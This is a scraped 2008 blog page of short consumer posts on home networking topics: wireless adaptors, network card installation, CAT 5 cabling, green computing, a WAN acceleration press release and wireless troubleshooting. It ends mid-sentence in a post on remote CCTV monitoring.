itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='3021999595541532811' itemprop='postId'/> <a name='3021999595541532811'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/wireless-network-adaptor.html'>Wireless Network Adaptor</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-3021999595541532811' itemprop='description articleBody'> You’ve been slaving away on your homework or that business deal at home in your home office all day long. Wouldn’t it be nice if you could take your work with you the living room so that you can curl up on the sofa with your laptop on a lap desk? Or what about relaxing in the cool breeze of your back porch?<br /><br />With the right wireless network adaptor, you can take a notebook computer and access the Internet anywhere in your home! Leave those old phone cords behind! This is the wireless age! Do you have kids who each have their own computers in their rooms? You can also connect all of the desktops in your home to the same high-speed Internet with one wireless connection.<br /><br />All you need is a high-speed Internet connection and a wireless network adaptor. It’s not very complex at all to install a wireless network adaptor in your home—you won’t need to bring in an expert! And it can be very inexpensive to buy a wireless network adaptor, too!<br /><br />Most wireless network adaptors are USB-compatible. All you do is have a high-speed Internet connected to one desktop computer in your home and then place the USB cord of your wireless network adaptor into a USB port on that desktop computer and a wireless PC card to receive the signals in the USB ports of every other computer. Voila! <br /><span class="fullpost"><br />The wireless network adaptor draws its power from the desktop computer, whether it’s on or not, as long as it’s plugged in, and begins emitting signals throughout the house. The other desktop computers and all of the laptop computers in your home will need wireless adaptor cards, which are also typically just plugged into a USB port, to receive the signals. Now you have working high-speed Internet anywhere in the house!<br /><br />The best part? Wireless network adaptors can be purchased for as little as $15! However, many others cost between $30-70 and some wireless network adaptors even costs hundreds of dollars. <br /><br />The more data you need to transmit and download and the more computers you have using the wireless network adaptor’s signals, the higher quality wireless network adaptor you may need. However, there’s no need to spend an enormous amount of money unless you’re using the wireless network adaptor at a business.<br /><br />You can try the Web site of your high-speed Internet provider or even the Web site of your computer manufacturer for a number of wireless network adaptors. Most wireless network adaptors are universal, however, so you can find great deals at electronics specialists online or at electronics stores. Try Best Buy, Circuit City, or even Amazon.com.<br /><br />Having the freedom to roam your house while working makes work feel like less of a chore. You don’t have to be "chained" to as desk anymore! Buy a wireless network adaptor and consider yourself free of wires and chains!<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/wireless-network-adaptor.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/wireless-network-adaptor.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:16:00+07:00'>12:16 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=3021999595541532811' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=3021999595541532811' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=3021999595541532811&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='4670440092201277988' itemprop='postId'/> <a name='4670440092201277988'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/why-use-network-card.html'>Why Use A Network Card</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-4670440092201277988' itemprop='description articleBody'> A network card is used to communicate between two or more networks. As the name suggests, wireless network cards allow different networks to communicate with each other, wirelessly. Wireless network card installation varies according to the type of network card used. Let's discuss this further.<br /><br />A small piece of hardware, wireless network cards are broadly of two types. Traditional PCI (Peripheral Component Interconnect) cards and USB (Universal Serial Bus) cards are two different types of network cards. The conventional PCI cards are slightly difficult to install as compared to the USB cards.<br /><br />Apart from these, there also exist PCMCIA cards which are typically for the use in notebooks and laptops. Also, there is a media adapter which is used to make a Wi-Fi wireless connection. It inserts into the Ethernet port of Xbox and Playstation.<br /><br />Basically, for every type of wireless network card installation you need to follow two steps. The first step is to connect the network card to the computer. The second step is to install the necessary software associated with the network card. The detailed description of a wireless network card installation is given below.<br /><span class="fullpost"><br />The installation of a USB network card is easy. That is why a large percentage of people prefer it. So we will cite the USB wireless network card installation process first. Simply plug the USB card into the empty USB slot of your computer. Windows will automatically detect it and will install the required software/drivers.<br /><br />Else, you can insert the compact disk into the CD-ROM drive. Then you have to give its path on the dialog menu popped by Windows. After the installation has completed, Windows will notify you that the new hardware is successfully installed and is available for use.<br /><br />In case of a PCI card, first you will have to switch the power off your computer. Then, you have to open the computer case and connect the card in the empty PCI slot. When this is done, you have to close the computer case and power on the PC. Windows will detect a new hardware and will try to install the needed drivers/software for it.<br /><br />If it finds them, then you will be prompted to use the network card. Else, you may have to install the drivers yourself by the same procedure followed in the USB wireless network card installation.<br /><br />The quality of the network card is one of the crucial factors which determine the strength of a wireless network. Hence, it is important to make sure that you purchase the best wireless network card. You can choose an established manufacturer for guaranteed strong wireless network.<br /><br />Wireless network card installation is not required in the new laptops and notebooks, as they are in-built and ready to be used. Remember to ensure that the firewall allows the card to detect and access other wireless networks. Now go ahead with confidence.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/why-use-network-card.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/why-use-network-card.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:16:00+07:00'>12:16 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=4670440092201277988' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=4670440092201277988' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=4670440092201277988&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='6896906863026251491' itemprop='postId'/> <a name='6896906863026251491'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/environmental-friendly-computers.html'>Environmental Friendly Computers</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-6896906863026251491' itemprop='description articleBody'> In the information age the important concern for human beings is related to environment protection. The need of the hour also implicates that every items and subjects we used in betterment of our life has some good or bad consequences on the environment. Computers could not be excluded from such category. After a long use of computers when the time comes for disposal we just throw it away which do nothing good to environment except as a non biodegradable waste. These non degradable wastes add to the woe of climate changes. Here we need green computing which is environment friendly. Green computing is all about the efficient use of computers and computing. The whole concept is to make computers friendlier to the environment, economy and society. Earlier computers are made considering the economic viability to the buyer. But in green computing manufacturers must consider the social responsibility and the impact of the environment apart from the economic viability before create computers. This way a computer could be disposable or recycled after it is used for a specific time period. The concept is to convert the use, creation and end of computers more eco friendly from beginning to end. Another aspect of green computing is how we use it which determines the amount of energy we spend on it. Many a time we leave the monitor or computer without turning it off. The result is we end up in using extra energy which we could save if turn it off when it is not in use.<br /><span class="fullpost"><br />For green computing the need is to create efficient systems those will implement all factors which would be environment friendly. It could be achieved if the hardware’s life is extended, its maintenance cost reduced and recycling of the waste computer easier than earlier. This will have little impact on the environment in a negative way which is the basic goal of the green computing. As a result of global warming and consumer awareness PC manufacturers giving importance to this aspect of computer manufacture. These eco-friendly computers would use less electricity and are made of recycled steel, aluminum or plastic. The screen and key boards could also be made of such recycled substances. The emission of any hazardous gas could then be stopped by using such eco-friendly computers which also looks like a fashionable. The making of green PCs would be a vital step towards tackling the climate change.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/environmental-friendly-computers.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/environmental-friendly-computers.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:14:00+07:00'>12:14 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=6896906863026251491' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=6896906863026251491' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=6896906863026251491&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='2557227045361614699' itemprop='postId'/> <a name='2557227045361614699'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/vital-information-about-cat-5-cable.html'>Vital Information about CAT 5 Cable Networks</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-2557227045361614699' itemprop='description articleBody'> Years ago, when personal computer systems for homes were relatively new, most people didn't think much about any home computer system network. A PC and a printer -- that was about it in those days. But times have changed -- today there is a much greater need for sophisticated home computer networks: many more devices are being interconnected, sophisticated ones -- such as flatbed scanners, laser printers, and fax machines.<br /><br />All of this has made it imperative to install an up-to-date cat 5 cable network. Of course, many people are already familiar with cat 5 cables -- typically a computer owner will have one or more cat 5 patch cables already in use, for connecting their computing devices together over short distances. It comes as a surprise to many computer owners to find out that they do not need to purchase pre-made cat 5 patch cables -- with just a little instruction and some inexpensive materials, anyone can learn to make their own.<br /><br />Of course one of the materials you will need to have on hand if you are doing your own cat 5 cable wiring is a good supply of cat 5 connectors. These are simply attached to each end of the cable, and allow for a quick connect or disconnect of the cable from various computer devices. These are actually called 8P8C connectors, and look just like the kinds of connectors used with telephones, just smaller. Learning how to attach these cat 5 connectors properly is a bit tricky, but you don't have to be a technician to learn how to do it properly.<br /><span class="fullpost"><br />As your home computer network grows in complexity, you may reach a point where you will need a cat 5 splitter. These are devices that will split -- divide -- the cat 5 cable wiring signal among different devices, so that each can operate properly. With a cat 5 splitter, you can control anywhere from two or three, up to a dozen, computing devices on the same network.<br /><br />One of the simplest computer networking arrangements would be to connect one computer directly with another. Normally, to do this you would need to use a network hub or switch. But if you want to save money, you can purchase a cat 5 crossover cable -- this properly switches the signal transmissions (the same way a network hub or switch would) so that both devices can communicate with each other directly. 5 crossover cables are generally no more expensive to purchase than other types of cat 5 patch cables.<br /><br />It may also interest you to know that even if you not have cat 5 cable wiring in your home, you may already have something similar, if you have an older computer network or a standard 2-line phone system. These older computer networks and telephone systems make use of an earlier generation of cable -- cat 3 cable. 3 cable is no longer used for newer home computer networking installations; in fact cat 5 cable has been superseded by an enhanced cable -- called cat 5e -- that provides superior signal quality and faster transmission speeds.<br /><br />There is much information available on the Internet today regarding cat 5 cable wiring and networking -- if you will take the time to read up on this subject, you will be able to handle this job yourself and avoid possible pitfalls. In no time at all, your new high-speed computer network will be operational -- and your be proud to say that you did all the work yourself!<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/vital-information-about-cat-5-cable.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/vital-information-about-cat-5-cable.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:13:00+07:00'>12:13 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=2557227045361614699' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=2557227045361614699' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=2557227045361614699&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='8629529980578390215' itemprop='postId'/> <a name='8629529980578390215'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/new-managed-wan-acceleration-service.html'>New Managed WAN Acceleration Service offered by Tredent Data Systems, Inc.</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-8629529980578390215' itemprop='description articleBody'> Tredent Data Systems, Inc., the leader in wide are networking, today announced that they have selected Riverbed's Steelhead platform, a highly scalable WAN acceleration solution, for a new Managed WAN Acceleration Service or Solution as a Service (SaaS). Riverbed's high-performance Steelhead platform enables Tredent's professional services staff to fine-tune network performance to improve application delivery and reduce bottlenecks. Tredent's new Managed WAN Acceleration Service, which relies on Riverbed's Steelhead platform, can help distributed enterprises to accelerate application delivery over the WAN, leverage WAN investments and boost user productivity.<br /><br />"We chose Riverbed Technology's high-performance Steelhead platform for our Managed WAN Acceleration Service because it enhances application visibility and improves application response time and WAN efficiency," said Charles Beck, vice president of sales at Tredent Data Systems, Inc. "Riverbed is helping us to deliver on our commitment to offer a world-class experience to our business customers. Their platform offers significant scalability which is enabling us to meet the needs of our multinational customers."<br /><br />The Steelhead platform improves application performance over the WAN by recognizing and eliminating redundant transmissions; accelerating TCP and application-specific protocols; prioritizing and allocating access to bandwidth; and ensuring high application availability at locations with various WAN connections. The Steelhead application acceleration platforms work end-to-end with a multitude of applications, including Web-based (HTTP,HTTPS,FTP,SSL, etc), client-server (CIFS, MAPI, SQL, Oracle, Email), custom software, voice and video. The platforms also include a broad set of management tools for monitoring and reporting on WAN optimization and application acceleration performance.<br /><span class="fullpost"><br />The new Managed WAN Acceleration Service (SaaS) offering will allow Tredent's customers take advantage of the business enhancements that WAN optimization and application acceleration bring to corporate networks without having the huge capital outlay that normally comes with deploying an enterprise wide WAN acceleration solution. This approach is allowing more businesses to take advantage of WAN optimization technology in their environment while only needing to make low monthly payments during the term of the service. "Most customers are choosing to make the term of the new Managed WAN Acceleration Service (SaaS) offering match that of their current WAN circuit contract so that they can make a decision on new technology or upgrades to existing technology when they are considering the renewal of their circuit contract" said Justin Lofton, senior systems engineer at Tredent Data Systems, Inc.<br /><br />About Tredent Data Systems, Inc.<br /><br />Tredent Data Systems, Inc. is a leading provider of systems integration solutions and services to medium and large business customers worldwide. Combining unsurpassed customer service with advanced technology and professional service capabilities, Tredent Data Systems, Inc. delivers innovative and unique business solutions to customers around the world. For more information, visit www.tredent.com.<br /><br />About Riverbed's Steelhead Appliances<br /><br />Riverbed's WDS solutions enable organizations with more than one office to overcome a host of severe problems, including poor application performance and insufficient bandwidth at remote sites. By speeding the performance of applications between distributed sites by five to 50 times and in some cases up to 100 times between enterprise data centers and remote offices, Riverbed's award-winning Steelhead WDS appliances enable companies to consolidate IT, improve backup and replication processes to ensure data integrity, and improve staff productivity and collaboration. Steelhead appliances have been deployed in organizations ranging from the world's largest corporations with offices around the globe to small companies with a couple of sites that are just miles apart.<br /><br />About Riverbed<br /><br />Riverbed Technology is the performance leader in wide-area data services (WDS) solutions for companies worldwide. By enabling application performance over the wide area network (WAN) that is orders of magnitude faster than what users experience today, Riverbed is changing the way people work, and enabling a distributed workforce that can collaborate as if they were local. Additional information about Riverbed (Nasdaq:RVBD) is available at www.riverbed.com.<br /><br />Riverbed Technology, Riverbed, Steelhead, RiOS, Interceptor, and the Riverbed logo are trademarks or registered trademarks of Riverbed Technology, Inc. All other trademarks used or mentioned herein belong to their respective owners.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/new-managed-wan-acceleration-service.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/new-managed-wan-acceleration-service.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T12:10:00+07:00'>12:10 PM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=8629529980578390215' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=8629529980578390215' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=8629529980578390215&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='5890578366468339336' itemprop='postId'/> <a name='5890578366468339336'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/how-networking-can-be-defined.html'>How Networking Can be Defined</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-5890578366468339336' itemprop='description articleBody'> Networking concept is widely used in various fields and technologies. Network is an arrangement of intersection horizontal and vertical lines like a structure of a net. A group of points are integrated for various reasons. This concept has been implemented in all technologies. The technologies such as computer systems, telecommunication, mobile cell, information, television, radio, internet, intranet, extranet are advanced because they adopted integration. <br /><br />The computer systems are most powerful machines in the present world that can be networked in different environment in different situations. Networking in the field of computing is the practice of linking computers together to support digital communication among them. Local Area Network (LAN), Wide Area Network (WAN), Metropolitan Area Networks (MAN), Wireless LAN, Intranet, Internet, and extranet. The client-to-client and server-to-client technology are the basic concept of advanced computer network. As a result, a chain of interconnected computers machines or operations are taken place. Computer networking companies manufacturing network devices for establishing robust networking. The research and development on the technologies create demand of network hardware and devices. Wireless networking and virtual networking is the latest network technologies are going to provide better services to the world. <br /><br />Intranet runs under one server and many client computers for limited people with security control. For an example, employees of a company can access a network for the internal communications. Extranet is such kind of networking environment that can be shared between more than one group for sharing and communications. The extranet is also security controlled for certain groups. Internet is a world wide network that connects millions of computers around the world. The internet also runs under secure socket level (SSL). The finance, banking, shopping companies run in internet under security level for reliance. <br /><span class="fullpost"><br />Besides wireless, virtual networking is an advanced networking technology helps people. Virtual Private Network (VPN) is private network in excess public infrastructure. Generally, VPN set up in homes and workplaces of employees for safely log into company networks. VPN is one of the convenient ways to stay connected to the corporate intranet for telecommuters. This network can be found in workplaces, homes and mobile places. Telecommuters travel and find a VPN a more convenient way to stay connected to the corporate intranet. A VPN supplies network connectivity over a possibly long physical distance. In this respect, a VPN is a form of WAN. This VPN has interesting aspects of network protocol design, network service outsourcing, Internet security, and technology standards. <br /><br />Mobile network provides mobile communications under Wire Less Program (WAP) technology. Certain networks control base transmission stations and links other networks for wide mobile services. Television or radio like wireless network is a group of broadcasting stations connected for a simultaneous broadcast of a program. <br /><br />We are one of the solution providers for all on-demand networking sectors to meet demand in cutting edge technologies. We provide end to end networking solutions that customers need to build an infrastructure of their own. We offer consultancy, design and installation for networking based infrastructures. <br /><br />Structured Cabling is our specialization in computer and other environments as well. Our extensive experience in voice and data networks i.e. Cat5e, Cat6 or fiber that means our ideally placed to deliver a solution to best meet your needs. We provide LAN, WAN and Wireless LAN with highly security provisions. We offer the latest in the field from wireless LAN to wireless WAN and personal area networks.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/how-networking-can-be-defined.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/how-networking-can-be-defined.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T10:55:00+07:00'>10:55 AM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=5890578366468339336' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=5890578366468339336' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=5890578366468339336&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='7491187370801761064' itemprop='postId'/> <a name='7491187370801761064'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/fix-wireless-network-connection.html'>Fix Wireless Network Connection</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-7491187370801761064' itemprop='description articleBody'> With the development of wireless networks this means that no matter where you are as long as you are in contact with a hotspot you can check your emails or surf the net wherever and whenever you want. However although it is a great system it can have its problems also and one of the most common ones faced is a loss of internet connection. In this article, we will go through some of the stages that will help to fix a wireless network connection when it suffers a problem.<br /><br />In many cases because when you are out and about with your laptop you will not actually have access to the hardware for the network you are connected to. Therefore, the only way you will be able to rectify this connection problem is with your laptop itself. Generally, within a matter of minutes you will be able to get the connection back that you have just loss. <br /><br />However it is important to remember that when ever you are trying to rectify a fault on your laptop or PC and not just the network connection you do it one step at the time. You also only make one change at the time on it or you could end up in a much more serious position than you are in currently. Also by changing, things one at a time it actually helps you to quickly discover what works and what does not. This you can then note down and use in the future if you need to.<br /><br />Step 1 – You know that you have the right hardware installed on your PC or laptop in order to connect to the internet but you can not actually work out why it is not connecting. What you need to do is go into the control panel on your PC or laptop and then go into network connections.<br /><span class="fullpost"><br />Step 2 – Upon doing this you will be shown a window on the screen in front of you, which shows you the possible network connections that are available for your laptop or PC. On this screen, you will see an icon saying wireless network you need to move the cursor over this and right click on your mouse. A list of different options will come up and you need to highlight and then click on properties.<br /><br />Step 3 – If all seems okay then you need to come out of here and then click on the icon again with the right button of the mouse and this time select repair. What this does is actually severs any connection you may currently have with the network and will then try to re-establish it once more. The connection it makes will either be to the current network you have been using or to one which has much better connectivity.<br /><br />However when it comes to a person trying to fix wireless network connection if they discover that this does not rectify the situation the only other choice they may initially is to actually reboot their PC or laptop. But you don't need to shut your machine off completely all you need to do is restart it and hopefully you may find that this is all it takes in order to rectify the problem.<br /></span> <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <span itemprop='name'>Ilmu komputer,Cerita,Tutorial</span> </span> </span> <span class='post-timestamp'> at <meta content='http://bens-qiu.blogspot.com/2008/04/fix-wireless-network-connection.html' itemprop='url'/> <a class='timestamp-link' href='http://bens-qiu.blogspot.com/2008/04/fix-wireless-network-connection.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2008-04-12T10:53:00+07:00'>10:53 AM</abbr></a> </span> <span class='reaction-buttons'> </span> <span class='star-ratings'> </span> <span class='post-comment-link'> <a class='comment-link' href='http://www.blogger.com/comment.g?blogID=7762973590000180538&postID=7491187370801761064' onclick=''> No comments: </a> </span> <span class='post-backlinks post-comment-link'> </span> <span class='post-icons'> <span class='item-action'> <a href='http://www.blogger.com/email-post.g?blogID=7762973590000180538&postID=7491187370801761064' title='Email Post'> <img alt='' class='icon-action' height='13' src='http://img1.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-790977273'> <a href='http://www.blogger.com/post-edit.g?blogID=7762973590000180538&postID=7491187370801761064&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='http://img2.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='7762973590000180538' itemprop='blogId'/> <meta content='7793314325461483616' itemprop='postId'/> <a name='7793314325461483616'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='http://bens-qiu.blogspot.com/2008/04/remote-cctv-monitoring-service-give.html'>Remote CCTV Monitoring service give peace of mind that your critical network devices</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-7793314325461483616' itemprop='description articleBody'> Remote monitoring allows you to make huge cost savings by reducing or even eliminating the need for on-site security personnel. It also allows you to provide the 24/7 authentication required for Police response to intruder situations. <br /><br />Whether CCTV is installed secretly or openly, modern digital communication technology enables SMS to monitor the situation anywhere in the world. Using 